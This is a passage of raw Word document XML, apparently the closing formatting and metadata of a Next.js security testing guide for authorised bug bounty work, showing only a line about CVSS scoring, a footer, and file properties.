          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CVSS score with your vector string</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="D1D5DB" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999999"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Next.js Security Testing Guide — 2025 | For authorized bug bounty testing only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2026-04-19T15:45:25.663Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-19T15:45:25.689Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>